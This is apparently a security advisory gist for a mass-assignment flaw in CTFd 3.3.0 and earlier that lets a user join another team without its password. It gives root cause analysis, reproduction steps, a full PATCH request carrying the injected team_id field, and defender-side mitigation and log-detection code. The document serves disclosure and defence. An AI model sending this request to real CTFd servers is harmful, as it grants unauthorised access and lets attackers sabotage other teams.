@pich4ya
Last active November 25, 2022 16:05
CTFd <= 3.3.0 Exploit: Join CTF teams without knowing the team password or having a team invite
@author Pichaya Morimoto (p.morimoto@sth.sh)
Vulnerability: Broken Access Control/Mass Assignment Vulnerability in CTFd <= 3.3.0
CVE: n/a
Impact:
- Join CTF teams without knowing the team password or having a team invite
- Can switch to another team, and switch back to the old team
Attack Scenario:
An attacker who joins another team can:
- View that team's hints without the team losing points (if a hint cost is set)
- Make incorrect submissions on the team's behalf until the maximum number of attempts is reached (if a limit is set)
Root Cause Analysis:
This is a classic Broken Access Control/Mass Assignment vulnerability: the attacker can supply team_id in the user-editable profile update, and the value is bound straight onto the user model.
CTFd does protect certain fields by marking them dump_only (id, oauth_id, and created), so client-supplied values for them are ignored, but team_id is not in that list!
https://github.com/CTFd/CTFd/blob/8de9819bd45be7483f252d37d0d0a2977dd7bd6d/CTFd/schemas/users.py#L19
class UserSchema(ma.ModelSchema):
    class Meta:
        model = Users
        include_fk = True
        dump_only = ("id", "oauth_id", "created")
Steps to reproduce:
1. Log in as a valid user in CTFd
2. Call https://ctfd/api/v1/teams to look up the target team's ID
3. Add or change the team ID by sending the following PATCH request with team_id set to the target team:
PATCH /api/v1/users/me HTTP/2
Host: [REDACTED]
Cookie: session=[REDACTED]
Content-Length: 84
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Accept: application/json
Content-Type: application/json
Csrf-Token: [REDACTED]
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://[REDACTED]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[REDACTED]/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"name":"sthpentest","email":"p.morimoto@sth.sh","country":"TH", "team_id":1337,"fields":[]}
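Defender-side helpers for the root cause and the request above, added here as an example and not taken from CTFd: an allowlist check that treats team_id the way the dump_only tuple treats id, oauth_id and created, plus a scan over request logs for PATCH /api/v1/users/me bodies that try to set it. The log format, the path pattern and the function names are assumptions.

```python
import json
import re

# Fields a user must never set through a self-service profile update. id,
# oauth_id and created mirror the dump_only tuple quoted above; team_id is the
# field the vulnerable schema left loadable.
PROTECTED_FIELDS = frozenset({"id", "oauth_id", "created", "team_id"})
# Assumed path pattern for the user update endpoint (/api/v1/users/me or an id).
SELF_UPDATE_PATH = re.compile(r"^/api/v1/users/(me|\d+)$")


def reject_protected_fields(payload):
    """Mitigation: split a PATCH body into allowed fields and the protected
    ones the client tried to set. A handler should answer 400 when the second
    list is non-empty rather than binding the payload to the model."""
    offending = sorted(k for k in payload if k in PROTECTED_FIELDS)
    allowed = {k: v for k, v in payload.items() if k not in PROTECTED_FIELDS}
    return allowed, offending


def find_mass_assignment_attempts(log_lines):
    """Detection: (user, path, fields) for each update request whose JSON
    body carries a protected field."""
    hits = []
    for line in log_lines:
        try:
            rec = json.loads(line)
            body = json.loads(rec.get("body") or "{}")
        except (json.JSONDecodeError, AttributeError, TypeError):
            continue  # malformed record or non-JSON body: not the pattern hunted here
        if rec.get("method") not in ("PATCH", "PUT") or not isinstance(body, dict):
            continue
        if not SELF_UPDATE_PATH.match(str(rec.get("path", ""))):
            continue
        _, offending = reject_protected_fields(body)
        if offending:
            hits.append((rec.get("user"), rec["path"], offending))
    return hits


# Constructed sample log (assumed format: one JSON record per line, request
# body kept as a string): a benign edit, the write-up's team_id request, a GET.
SAMPLE_LOG = [json.dumps(r) for r in (
    {"method": "PATCH", "path": "/api/v1/users/me", "user": "alice",
     "body": '{"country":"TH","fields":[]}'},
    {"method": "PATCH", "path": "/api/v1/users/me", "user": "sthpentest",
     "body": '{"name":"sthpentest","country":"TH","team_id":1337,"fields":[]}'},
    {"method": "GET", "path": "/api/v1/teams", "user": "sthpentest", "body": ""},
)]
```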